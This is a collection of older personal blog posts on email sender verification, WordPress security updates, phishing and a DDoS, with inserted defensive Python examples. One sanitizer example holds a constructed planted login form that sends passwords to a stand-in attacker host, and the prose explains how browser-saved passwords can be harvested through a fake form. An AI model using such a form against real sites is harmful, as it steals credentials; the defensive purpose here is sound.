Flagging (Non)-Spoofed Mail
Thursday, May 1st, 2008 Posted in Computers/Internet, Spam
Following up on the PayPal anti-phishing discussion of a few weeks ago, I see that PayPal is promoting a service called Iconix. You install the program on your system, and it looks at your inbox for messages that claim to be from one of its customers. It tries to verify them “using industry-standard authentication technologies such as Sender ID and DomainKeys.” Messages that pass get a lock-and-checkbox icon attached to the sender’s name, and in some cases the name is replaced by the sender’s logo.
On the tech side, it’s similar to SpamAssassin’s whitelist_from_spf and whitelist_from_dkim features. Both allow you to specify a sender to whitelist, and it will only give a message special treatment if it can verify the sender.
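To make that distinction concrete, here is an added example (not SpamAssassin’s code, and not from the original post) of the logic behind whitelist_from_spf and whitelist_from_dkim: a sender domain on the whitelist gets special treatment only when the receiving mail server’s Authentication-Results header shows SPF or DKIM passing for that same domain. The domain paypal.example, the authserv-id mx.example.net and the four messages are constructed; the trust assumption is that Authentication-Results was written by your own MTA and stripped from incoming mail, which a real deployment must guarantee.

```python
"""Whitelist a sender only when the message authenticates for that sender's
domain. Added illustration of the idea behind SpamAssassin's
whitelist_from_spf / whitelist_from_dkim; not SpamAssassin's own code.
Assumes a trusted Authentication-Results header (RFC 5451) written by the
receiving MTA. All sample messages and domains below are constructed."""
import re
from email import message_from_string
from email.utils import parseaddr

# Hypothetical whitelist keyed by sender domain (SpamAssassin takes an
# address pattern; a bare domain keeps the example short).
WHITELIST = {"paypal.example"}

# One Authentication-Results clause, e.g.
#   "spf=pass smtp.mailfrom=bounce@paypal.example"
#   "dkim=pass (2048-bit key) header.d=paypal.example"
AUTH_CLAUSE = re.compile(
    r"^(spf|dkim)=pass\b.*?(?:smtp\.mailfrom|header\.d|header\.i)="
    r"(?:[^@\s]*@)?([\w.-]+)",
    re.IGNORECASE | re.DOTALL,
)

def from_domain(msg):
    """Domain part of the From: address, lower-cased ('' if absent)."""
    _, addr = parseaddr(msg.get("From", ""))
    return addr.rpartition("@")[2].lower()

def auth_method(msg, want_domain):
    """Return 'spf' or 'dkim' if Authentication-Results reports a pass for
    want_domain, else None."""
    for header in msg.get_all("Authentication-Results", []):
        # Clause 0 is the authserv-id (the server that did the checking).
        for clause in header.split(";")[1:]:
            m = AUTH_CLAUSE.match(clause.strip())
            if m and m.group(2).lower() == want_domain:
                return m.group(1).lower()
    return None

def authenticated_by(raw):
    """Which method (if any) authenticates the From domain of a raw message."""
    msg = message_from_string(raw)
    return auth_method(msg, from_domain(msg))

def classify(raw):
    """'whitelist' if the From domain is listed AND authenticated,
    'unverified' if listed but not authenticated (a plain whitelist_from
    entry would wrongly trust this one), 'normal' otherwise."""
    msg = message_from_string(raw)
    domain = from_domain(msg)
    if domain not in WHITELIST:
        return "normal"
    return "whitelist" if auth_method(msg, domain) else "unverified"

# Constructed sample messages; only the headers matter here.
GENUINE = """\
From: PayPal <service@paypal.example>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=bounce@paypal.example;
 dkim=pass (2048-bit key) header.d=paypal.example
Subject: Your receipt

(body)
"""
DKIM_ONLY = """\
From: PayPal <service@paypal.example>
Authentication-Results: mx.example.net; spf=softfail smtp.mailfrom=paypal.example;
 dkim=pass header.i=@paypal.example
Subject: Forwarded receipt

(body)
"""
SPOOFED = """\
From: PayPal <service@paypal.example>
Authentication-Results: mx.example.net; spf=fail smtp.mailfrom=paypal.example; dkim=none
Subject: Verify your account

(body)
"""
UNRELATED = """\
From: Bob <bob@example.org>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=example.org
Subject: lunch?

(body)
"""

if __name__ == "__main__":
    for name, raw in [("GENUINE", GENUINE), ("DKIM_ONLY", DKIM_ONLY),
                      ("SPOOFED", SPOOFED), ("UNRELATED", UNRELATED)]:
        print(f"{name:10s} -> {classify(raw)} ({authenticated_by(raw)})")
```

The forwarded message is the case that matters: SPF breaks when mail is relayed, so a whitelist that only accepted SPF would lose it, while the DKIM signature still identifies the domain.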
On the user-interface side, it’s similar to EV certificates, in that it tries to highlight a “good” class of messages rather than flag or filter out a “bad” class.
It’s not a bad idea, actually, and now I’m surprised I haven’t seen something similar in other email clients. It’s sort of like setting up custom ringtones or images for the contacts in your cell phone’s address book.
They seem to be focused on webmail and Outlook so far, and only on Windows, but it looks like the perfect candidate for a Thunderbird extension. They do have a sign-up form to notify you when they add support for various programs and OSes, and I was pleased to see not only Thunderbird and Mac OS listed, but Linux as well. Too often, Linux gets forgotten in the shuffle to ensure compatibility with every Windows variation.
Links: Freedom and Security
Thursday, April 24th, 2008 Posted in Comics, Computers/Internet, Politics
The CBLDF has issued a press release detailing the victory in the Gordon Lee case. This was the case in which a comic book store in Rome, Georgia, as part of a 2004 Halloween promotion, was handing out free comics left over from that year’s Free Comic Book Day. Among over 2,000 comics, they accidentally included a copy of Alternative Comics #2, which included a story about Picasso which included him running around his studio in the nude. And they accidentally gave it to a kid. The parents wouldn’t accept an apology, and pressed charges instead. The DA has been determined to make an example out of him, pushing grossly overinflated charges including felonies that would have given him prison time. 3½ years, 3 trial dates, a mistrial for prosecutorial misconduct, and $100,000 in defense costs later, the Rome DA finally agreed to drop the case in exchange for a written letter of apology — which is exactly what the store owner had offered in the first place.
Cookie Security in WordPress 2.5. The latest version of the blogging software has a feature that can make it harder for attackers to grab your login sessions. It involves setting a pass phrase in wp-config.php, one which you’ll never have to remember, but which will be unique to your site. You have to copy the SECRET_KEY section from wp-config-sample.php and add in your passphrase…or you can generate a random code at http://api.wordpress.org/secret-key/1.0/ (be sure to put it in the middle of the file!)
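As an added illustration of why that secret matters (a simplified model of keyed cookie signing, not WordPress’s actual cookie format or code): the server appends an HMAC of the cookie’s contents computed under the site secret, so a cookie can only be minted or altered by someone who holds that secret. SECRET_KEY and SAMPLE_DEFAULT are constructed placeholders; the last check shows that a site still running on an unchanged, publicly known default accepts cookies anyone could have signed.

```python
"""Keyed (HMAC) login cookies: an added, simplified model of why a per-site
secret makes sessions hard to forge. Not WordPress's cookie format or code.
SECRET_KEY and SAMPLE_DEFAULT are constructed placeholders."""
import hashlib
import hmac
import time

# Per-site secret: long, random, never shown to users (stands in for the
# wp-config.php value described in the post).
SECRET_KEY = "site-specific-phrase-CONSTRUCTED-FOR-THIS-EXAMPLE"
# Stands in for a value copied unchanged from a sample config: anyone who
# can read the sample file knows it, so cookies signed with it are forgeable.
SAMPLE_DEFAULT = "sample-default-phrase-CONSTRUCTED"

def _mac(payload, secret):
    return hmac.new(secret.encode(), payload.encode(), hashlib.sha256).hexdigest()

def make_cookie(username, expires, secret=SECRET_KEY):
    """Return 'username|expires|mac'; the mac binds both fields to the secret."""
    if "|" in username:
        raise ValueError("username may not contain the field separator")
    payload = f"{username}|{int(expires)}"
    return f"{payload}|{_mac(payload, secret)}"

def verify_cookie(cookie, secret=SECRET_KEY, now=None):
    """Return the username if the cookie is intact and unexpired, else None."""
    parts = cookie.split("|")
    if len(parts) != 3 or not parts[1].isdigit():
        return None
    username, expires, mac = parts
    # Constant-time comparison: a plain == leaks where the mismatch starts.
    if not hmac.compare_digest(mac, _mac(f"{username}|{expires}", secret)):
        return None
    if (time.time() if now is None else now) >= int(expires):
        return None
    return username

if __name__ == "__main__":
    far = int(time.time()) + 3600
    good = make_cookie("alice", far)
    print("genuine           :", verify_cookie(good))
    # Attacker signs an admin cookie with the guessed sample default:
    forged = make_cookie("admin", far, secret=SAMPLE_DEFAULT)
    print("forged, real key  :", verify_cookie(forged))
    print("forged, default   :", verify_cookie(forged, secret=SAMPLE_DEFAULT))
    # Attacker edits the username but cannot recompute the mac:
    print("tampered          :", verify_cookie(good.replace("alice", "admin")))
```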
The Internet Storm Center writes on Hundreds of Thousands of SQL Injections — all websites that have been hacked to host various sorts of malware.
Blocking IE6: You, Me and…PayPal?
Monday, April 21st, 2008 Posted in Browsers, Computers/Internet, Web Design
On Thursday I stumbled across a campaign to Trash All IE Hacks. The idea is that people only stay on the ancient, buggy, feature-lacking, PITA web browser, Internet Explorer 6, because we web developers coddle them. We make the extra effort to work around those bugs, so they can actually use the sites without upgrading.
Well, yeah. That’s our job.
And a bunch of random websites blocking IE6 aren’t going to convince people to change. If I were to block IE6, or only allow Firefox, or only allow Opera, I’d have to have seriously compelling content to get people to switch. Mostly, people would get annoyed and move on. Who’s going to install a new browser just so they can read the history of the Flash? Or choose an ISP? Or buy a product that they can get from another site?
Slapping the User in the Face
It’s so easy for someone to walk away from your site. One of the tenets of good web design is to make the user jump through as few hoops as possible to accomplish whatever you want him/her to do. Every hoop you add is an obstacle. Too many obstacles, and they’ll just go somewhere else more convenient.
Back when I was following Spread Firefox, every once in a while someone would suggest blocking IE. Every time, people like me would shoot it down.
Webbish Links
Thursday, February 7th, 2008 Posted in Browsers, Web Design
The WaSP Buzz recently posted several links to CSS resources, including a rather thorough CSS Reference at SitePoint.
The ISC reminds us that IE7 will be pushed out to WSUS next week, which should help get rid of IE6. Yeah, I’d rather more people switched to Firefox or Opera, but I’m at the point where I’d love to be able to stop worrying about IE6’s shortcomings when trying to build sites. IE7’s shortcomings are much easier to work around. (Sorry to keep harping on this!)
The inventor of Norton Antivirus talks about computer security and has some rather interesting ideas on what policies are worth pursuing…and what policies aren’t. Long passwords? Great for protecting a stand-alone machine, but on a 10,000-machine network, they only need to crack one. Patch everything? Not every vulnerability gets exploited. I’ll have to read the Slashdot thread when I have time; that should be really *ahem* interesting.
Net Links
Tuesday, January 29th, 2008 Posted in Computers/Internet, Web Design
Hixie’s Natural Log: Come up with the best test for Acid3. Edit: Strike that, Acid3 has been completed.
Links: Safety Last
Wednesday, December 26th, 2007 Posted in Humor, Tech
Forklift Driver Klaus (a.k.a. Staplerfahrer Klaus), a parody of work safety films in which a forklift driver blunders through his first day on the job, maiming fellow employees left and right. German with English subtitles. (via TV Tropes: Scare Em Straight)
And, on a more serious note, the Internet Storm Center is reporting on people finding malware pre-installed on digital picture frames, memory cards, etc. Something to watch out for with portable devices that can connect to your computer.
Firefox, Kindle(ing) and more
Tuesday, November 20th, 2007 Posted in Computers/Internet, Entertainment, Mozilla
Firefox 3 Beta 1 is out. Nice so far. Oddly enough, it runs better than the current Opera 9.5 previews on my old Linux box at work, though that mostly seems to be the fault of the find-in-history option.
I usually avoid any sort of shopping on the day after Thanksgiving, online included, but I’ve been getting email from various online stores that are trying to get into Black Friday. Amazon is advertising a Black Friday Sale, and Apple is promoting a “special one-day shopping event” on their website—and annoyingly, neither of them is giving any clue as to what sort of deals are involved. Amazon keeps forwarding me to today’s deals, and Apple just says something’s coming. And neither site lists actual hours. Is it midnight to midnight? What time zone?

Speaking of Amazon, their entire home page is currently taken up by the announcement of their new eBook reader, Kindle. At $400 I’m not going to rush out and buy one, but it looks like they’ve solved some of the main e-book problems: it’s small, light and wireless, and they even bring up the reading-in-bed issue in the intro. The real question is going to be compatibility & openness: It’ll read plain text, HTML, Word, and a few other document formats (and they’re promoting its access to Wikipedia), so it should be possible for other stores to sell books for the device. And what about the e-book offerings themselves? Will they be loaded down with draconian digital rights management like the Adobe ebooks of a few years ago, or are they following the model of Amazon’s MP3 store?* In a nice change, their music downloads are entirely DRM-free and they use it as a selling point. Edit: Per Andrea’s comments and further research, Kindle ebooks are locked down with DRM. No, thanks!
The name, however, makes me wonder how soon they’ll offer Fahrenheit 451.
Finally, the Internet Storm Center has an insightful response to the statement, “There is nothing on my computer that a hacker would be interested in.” Let’s leave aside the question of your personal data for the moment. Just the fact that you’ve got a computer with an internet connection could prove very useful to someone who wants to cover their tracks or just add more power to their own distributed system.
* Amazon’s MP3 store is also surprisingly cheap. I replaced my old tapes of the original cast recordings of Les Misérables (Broadway) and Phantom Of The Opera for $9 each—they run upwards of $30 on CD.
Patch…Friday?
Friday, September 7th, 2007 Posted in Site Updates
I suppose it’s best to release the security fixes when they’re ready, because any time you pick is going to be inconvenient for someone, but lately it seems like Friday is suddenly in style.
Last Friday saw the release of PHP 5.2.4, on the Friday before—in the US, anyway—a 3-day weekend. This morning Apache released security updates for all three supported branches of their webserver. And this evening—yes, Friday evening—WordPress 2.2.3 came out.
Which reminds me, I’m going to have to start looking at the betas for WordPress 2.3. I think it’ll be a good time for a redesign. Maybe pick a new theme and tweak that one, maybe try my hand at actually designing one. I wonder if the new tagging system can import Bunny’s Technorati Tags.
WordPress 2.1.1 Security Alert
Friday, March 2nd, 2007 Posted in Site Updates
Sometime in the last 3-4 days, someone managed to alter the download for WordPress 2.1.1, adding a remotely exploitable security hole. The WordPress team has declared the release “dangerous” and has issued an update, WordPress 2.1.2, taken from the clean source plus a few fixes. If you run WordPress 2.1.1, upgrade ASAP!
Things worth noting:
- The SVN source that the developers use was not altered.
- Older versions, such as 2.0, don’t seem to have been affected.
- If you downloaded 2.1.1 when it was first released, it’s probably okay.
- 2.1.2 also includes a fix for a cross-site scripting vulnerability discovered a few days ago, so it’s worth updating anyway.
I still had the tar archive of 2.1.1 from when I grabbed it the day of the release, so I compared its contents to the 2.1.2 archive. The two files mentioned in the announcement, feed.php and theme.php, aren’t any different, confirming that the initial release was unaffected. That’s also where I saw the changes for that XSS bug.
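The comparison described above, as an added example (not the author’s own script): hash every file in two release tarballs and list what was added, removed or changed, which is how a swapped download shows up even when file sizes and names match. The two archives and their contents are constructed in memory here to stand in for the 2.1.1 and 2.1.2 downloads; the paths are illustrative. Run against real downloads, read the two files from disk instead and pass their bytes to compare_archives.

```python
"""Compare two release archives file by file by SHA-256 (added example; not
the author's script). OLD and NEW are constructed in-memory tarballs standing
in for two downloads; their paths and contents are illustrative."""
import hashlib
import io
import tarfile

def archive_digests(data):
    """Map each regular file's path (top-level directory stripped) to its SHA-256."""
    digests = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar:
            if not member.isfile():
                continue
            path = member.name.split("/", 1)[1] if "/" in member.name else member.name
            digests[path] = hashlib.sha256(tar.extractfile(member).read()).hexdigest()
    return digests

def compare_archives(old, new):
    """Return which paths were added, removed, changed or left unchanged."""
    a, b = archive_digests(old), archive_digests(new)
    both = set(a) & set(b)
    return {
        "added": sorted(set(b) - set(a)),
        "removed": sorted(set(a) - set(b)),
        "changed": sorted(p for p in both if a[p] != b[p]),
        "unchanged": sorted(p for p in both if a[p] == b[p]),
    }

def build_tar(root, files):
    """Construct a gzip tarball in memory from {path: text} (sample data only)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, text in files.items():
            data = text.encode()
            info = tarfile.TarInfo(f"{root}/{name}")
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

# Constructed stand-ins for the clean download and the follow-up release.
OLD = build_tar("wordpress", {
    "wp-includes/feed.php": "<?php /* feed code, same in both */\n",
    "wp-includes/theme.php": "<?php /* theme code, same in both */\n",
    "wp-admin/post.php": "<?php /* 2.1.1 code */\n",
    "readme.html": "<h1>Version 2.1.1</h1>\n",
})
NEW = build_tar("wordpress", {
    "wp-includes/feed.php": "<?php /* feed code, same in both */\n",
    "wp-includes/theme.php": "<?php /* theme code, same in both */\n",
    "wp-admin/post.php": "<?php /* 2.1.2 code with the XSS fix */\n",
    "readme.html": "<h1>Version 2.1.2</h1>\n",
})

if __name__ == "__main__":
    for kind, paths in compare_archives(OLD, NEW).items():
        print(f"{kind:9s}: {', '.join(paths) or '-'}")
```

The useful signal is the “changed” list: files that the release notes don’t mention, or a file that differs between two copies of the same version number, are exactly what a tampered download looks like.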
*sigh* It’s always something…
WordPress 2.0.7 security & feed fix
Monday, January 15th, 2007 Posted in Site Updates
Just upgraded to WordPress 2.0.7. It fixes a security issue with certain versions of PHP, and it also includes the fix for the feed problem in 2.0.6 and a couple other minor fixes.
According to the announcement, WP 2.1 should be out by the end of the month. Looks like it’s almost time to see how many of my customizations will work with the new version.
The Danger of Saving Passwords
Wednesday, November 22nd, 2006 Posted in Browsers
ISC is reporting a new type of vulnerability in web browsers that the discoverer has termed “Reverse Cross-Site Request,” or RCSR.
Basically, on a site with user-generated content—like a hosted blog—it’s possible to add a form that looks like the site’s login form. If the victim has an account on the same site, and has asked their browser to save their password, it will auto-fill the form. If the attacker can somehow trick the visitor into submitting the form—say, with an invisible image submit button (ever clicked randomly? Or to get back to the page after looking at another window?)—the attacker gets the visitor’s password.
What’s new about this is that all it requires is plain HTML, not scripting, which most blog hosts and similar sites already block.
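One server-side mitigation for hosts that accept user HTML, as an added example (not from the post, from Mozilla, or from any blog host): sanitize submitted markup against a small allowlist so that form, input and button elements, the only thing this attack needs, never reach the page, and report what was dropped so moderators can see attempts. The allowed tag list and the sample comment are constructed; a production host would use a maintained sanitizer library configured to reject the same elements.

```python
"""Allowlist HTML sanitizer that removes form-related markup from
user-generated content (added example; not the post's or any host's code).
Tags outside ALLOWED_TAGS, including form/input/button, are dropped; only
listed attributes survive, so event handlers never do. Sample input constructed."""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li",
                "blockquote", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
SAFE_HREF_PREFIXES = ("http://", "https://", "/")

class FormStrippingSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []   # removed tags, for moderation logs

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)      # form, input, button, script, ...
            return
        kept = []
        for name, value in attrs:
            value = (value or "").strip()
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                  # onclick= and friends end here
            if name == "href" and not value.lower().startswith(SAFE_HREF_PREFIXES):
                continue                  # javascript: and data: links go away
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))     # text is re-escaped, never trusted

def sanitize(html):
    """Return (clean_html, dropped_tags)."""
    parser = FormStrippingSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.dropped

# Constructed comment: a real remark followed by a planted login form.
SAMPLE = (
    '<p>Nice post!</p>'
    '<form action="https://attacker.example/collect" method="post">'
    '<input name="log"><input type="password" name="pwd">'
    '<input type="image" src="blank.gif">'
    '</form>'
)

if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE)
    print(clean)
    print("dropped:", dropped)
```

Blocking scripts alone, as the post notes, is not enough here; the allowlist approach catches the plain-HTML form because anything not explicitly permitted is removed, rather than trying to enumerate dangerous tags.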
Chapin Information Services discovered the bug in Firefox 2, and reported it to Mozilla. It turns out that Internet Explorer 6 and 7 are also vulnerable, but only if it’s on the same page as the real login form. Mozilla is currently trying to determine the best way of resolving the problem without breaking all the passwords people have already saved. The ISC article links to the bug report, so you can follow the discussion. Microsoft has only said that they’re “aware of the issue.”
At the moment, I’m glad I don’t let web browsers save my passwords.
Assault via Battery?
Tuesday, October 10th, 2006 Posted in Apple, Strange World
Received the replacement battery for the PowerBook yesterday. It was shipped out via DHL, with a prepaid return label for shipping the old battery back via regular mail.
Last night I drained the old battery, plugged the new one in, and packaged up the recalled one in the box. At lunch today I went to the post office to send it off.
As I was walking up the steps, I remembered the “Does this package contain anything liquid, explosive, or otherwise hazardous?” question that postal clerks are required to ask. If you’re mailing a defective battery that could theoretically burst into flames, how exactly are you supposed to answer?
I figured it would be best not to joke about it.
As it was, I just said it was a laptop battery straight out, so the question didn’t come up.
Back to Basics: Phish by Phone
Friday, September 8th, 2006 Posted in Spam
I just spotted a rather disturbing phishing message in (of all places) our abuse contact mailbox:
Subject: Fraud Prevention Measures
Dear customer!
Due to high fraud activity we constantly increasing security level both for online banking and card transactions. In order to update our records you are required to call MBNA Card Service number at 1-800-[removed] and update information on your MBNA card.
This is free of charge and would not affect any transactions with your card. Please note this is necessary to provide highest security level for all transactions with your card.
No HTML tricks. No links to fraudulent websites. Just a phone number.
I can only assume this is a response to the high-profile inclusion of antiphishing features in Internet Explorer 7 and in Firefox 2. If there’s no website, there’s nothing for a web browser to check.
And of course by not using sneaky technical tricks in the message, it’s harder for tools like ClamAV, spam filters, or mail clients to detect.
Incidentally, does anyone else find it ironic that one of the most common phishing techniques is to exploit people’s fear of being phished?
Further reading: Anti-Phishing Working Group.
WordPress Security Fix: WP 2.0.4
Friday, July 28th, 2006 Posted in Site Updates
A few days ago, Dr. Dave of Spam Karma fame alerted WordPress users to an unspecified security issue. The workaround: disable registration of new users. Today, the WordPress folks have released WordPress 2.0.4. The security fix means it’s time to upgrade ASAP.
Hmm, I wonder if it takes care of all the bugs handled by the WordPress 2.0.3 Tuneup. Edit: It looks like it squashes 3 out of 6.
Stupid Sysadmin Tricks: Blue vs. 6A
Thursday, May 4th, 2006 Posted in Annoyances, Computers/Internet
Remember how LiveJournal, TypePad, and related sites were down the other day? The official line was that “Six Apart has been the victim of a sophisticated distributed denial of service attack.”
It turns out that the DDOS wasn’t aimed at 6A, LJ, or any other part of their network. It was aimed at Blue Security, an anti-spam company, who decided to re-route their web traffic to their blog—a blog hosted on TypePad. So instead of their own site going down, it took out Six Apart’s entire network of millions of bloggers.
Classy move, guys.
I do admire Six Apart’s restraint in not pointing fingers themselves. If it had been my site (though in a way, I suppose it was, since I’ve got an LJ blog, even if I don’t update it very often), I would have been royally pissed off.
Sure, Blue Security didn’t launch the attack—but they did choose where to redirect it. Maybe they thought Six Apart would be able to handle it. Maybe they thought the attackers were targeting them by IP and not domain name. Maybe they were panicked and didn’t think. Maybe they thought things through, but 6A got bitten by the now-all-too-familiar law of unintended consequences. They could easily have pointed their domain name at empty IP space, or to localhost. Redirecting it to a third party was less like deflecting a punch and more like the “Do it to Julia!” moment in 1984, or the classic joke, “I don’t have to outrun the bear, I only have to outrun you.”
Update: Additional articles at Computer Business Review and at Netcraft, and a Slashdot story.
Update 2: According to Blue Security, the DDoS was not targeting their website by name, and the DDoS didn’t attack their blog until after they had already redirected the website. So it looks like it was less a case of them redirecting the attack and more a case of the attackers chasing them.
*Sigh* Must remember to collect all facts before engaging in righteous anger.
Update 3 (May 9): Apparently “all the facts” as reported by Blue Security don’t add up… (via Happy Software Prole)

